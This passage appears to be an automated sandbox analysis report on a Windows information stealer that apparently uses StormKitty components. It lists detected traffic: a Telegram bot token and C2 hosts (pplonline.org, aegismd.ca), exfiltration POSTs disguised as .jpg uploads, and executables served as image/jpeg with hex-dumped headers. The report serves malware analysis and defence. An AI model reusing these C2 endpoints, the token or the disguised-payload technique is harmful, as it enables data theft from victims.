00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 
00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:27 GMT Server: Apache Last-Modified: Thu, 06 Jun 2019 09:02:02 GMT Accept-Ranges: bytes Content-Length: 83784 Keep-Alive: timeout=5, max=69 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 
74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
May check the online IP address of the machine
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe DNS query: name: ip-api.com
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe DNS query: name: icanhazip.com
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe DNS query: name: icanhazip.com
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe DNS query: name: ip-api.com
Posts data to a JPG file (protocol mismatch)
Source: unknown HTTP traffic detected: POST /Cgi//6.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: pplonline.org Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: aegismd.ca/cgi/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /caxmd/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/lib/net40/DotNetZip.dll HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /caxmd/StormKitty/master/StormKitty/stub/packages/AnonFileApi.1.14.6/lib/net40/AnonFileApi.dll HTTP/1.1 Host: raw.githubusercontent.com
Source: global traffic HTTP traffic detected: GET /bot1456609378:AAEnBfmWHEJfWWOpiWK1aoQnqzDubVAn7J4/getMe HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Cgi//6.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: pplonline.org Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /Cgi//1.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: pplonline.org Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /Cgi//2.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: pplonline.org Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /Cgi//3.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: pplonline.org Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /Cgi//4.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: pplonline.org Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /Cgi//5.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: pplonline.org Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /Cgi//7.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: pplonline.org Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /Cgi//main.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: pplonline.org Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /Cgi/ HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 91380 Host: pplonline.org Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 12:49:21 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 06 Jun 2019 09:01:52 GMTAccept-Ranges: bytesContent-Length: 144848Keep-Alive: timeout=5, max=75Content-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 
ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 12:49:22 GMTServer: ApacheLast-Modified: Mon, 07 Aug 2017 00:52:20 GMTAccept-Ranges: bytesContent-Length: 645592Keep-Alive: timeout=5, max=74Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 08 00 00 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 12:49:23 GMTServer: ApacheLast-Modified: Thu, 06 Jun 2019 09:00:58 GMTAccept-Ranges: bytesContent-Length: 334288Keep-Alive: timeout=5, max=73Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 
00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 12:49:24 GMTServer: ApacheLast-Modified: Thu, 06 Jun 2019 09:01:20 GMTAccept-Ranges: bytesContent-Length: 137168Keep-Alive: timeout=5, max=72Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 